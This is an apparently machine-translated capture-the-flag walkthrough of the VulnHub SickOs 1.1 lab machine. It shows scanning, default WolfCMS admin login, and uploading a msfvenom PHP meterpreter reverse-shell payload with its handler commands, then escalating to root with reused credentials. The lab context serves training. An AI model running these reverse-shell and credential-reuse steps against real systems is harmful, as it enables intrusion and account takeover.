VulnHub drone-SickOs1.1
Download address: https://www.vulnhub.com/entry/sickos-11,132/ After
downloading the target machine, open it under VMware Workstation, and configure the network card as a bridge.
Task : Elevate privileges and obtain flag
Attack machine: kali linux 192.168.8.195
target machine : 192.168.8.194
Article Directory
1. Information collection
nmap detects the surviving host and finds the target drone
Command: nmap -sP 192.168.8.0/24
nmap scans the open ports of the target machine and knows that ports 22, 3128, and 8080 are open, and it prompts that you need to proxy port 3128 to access the
command: nmap -A -p- 192.168.8.194
proxy 192.168.8.194 : 3128
access 192.168.8.194, Looking at the source code, no useful information was found.
Try to access robots.txt, you can
visit http://192.168.8.194/wolfcms from /wolfcms, woflcms is a lightweight cms program written in PHP. The background entrance is http://192.168.8.194/wolfcms/?/admin/login
. The default user name and password of wolfcms are admin and admin respectively. Try to log in, log in successfully, and find the file upload location on the page
二、Getshell
Here select the file upload getshell. The method is msfvenom generates a Trojan horse, msfconsole monitors, after uploading the file, execute the file to getshell
msfconsole monitors, where lhost is set to the IP of the attacker, and lport can set a listening port at will.
Command:
use exploit/multi/hadler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.8.195
set lport 4444
run
msfvenom generates a shellcode, put the shellcode Copy it to a php file, here copy it to the slow.php
command: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.8.195 lport=4444 -f raw
-p: select a payload
-f: output format, here select raw format , Raw is a native format with only data in it
. After uploading slow.php, visit public and execute slow.php
successfully to getshell
Three, right escalation
Python enters pseudo-protocol
Check the configuration file config.php of wolfcms, you can find the user name and password to
log in to root, but the login fails, check /etc/passwd, find sickos, the default id of the first user added in linux is 1000, this sickos is the first user
Try to log in to sickos, successfully log in
Log in to root from the sickos user.
After successfully logging in, find the flag in the /root directory. So far, the target machine has been completed.